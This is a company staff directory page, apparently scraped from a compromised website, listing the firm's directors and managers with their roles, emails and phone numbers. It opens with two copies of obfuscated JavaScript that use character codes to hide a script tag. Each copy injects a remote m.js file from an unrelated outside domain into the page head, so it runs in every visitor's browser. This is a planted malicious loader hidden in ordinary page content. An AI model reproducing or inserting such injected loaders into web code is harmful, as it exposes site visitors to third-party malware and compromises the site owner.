Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,104,116,46,115,101,99,111,110,100,97,114,121,105,110,102,111,114,109,116,114,97,110,100,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Investors and Directors

Giuseppe Comberlato

Giulio Vettorato

CEO

giulio.vettorato@immmes.com

+39 335 842 0678

Direction

Paolo Reffo Scarso

Paolo-Scarso
Sales & Marketing
paolo.reffo@immmes.com

+39 345 032 5955

Giovanni Beccaro

Technical & Security Department
tecnico@immmes.com

 

Management

Stefania Bovo

Sales Office

info@immmes.com

Massimo Grippo

Massimo-Grippo

Mara Fabris

Administrative Manager

immmes@immmes.com

Marco Paiusco

Accounting Manager

marco.paiusco@immmes.com

Nicola Lago

Nicola Lago
Plants Technical Office

nicola.lago@immmes.com

Renzo Casarin

Plants Design Manager

renzo.casarin@immmes.com

Albertino Brusegan

Structures Department Manager

albertino.brusegan@immmes.com

Daniele Comberlato

Plants Technical Office

daniele.comberlato@immmes.com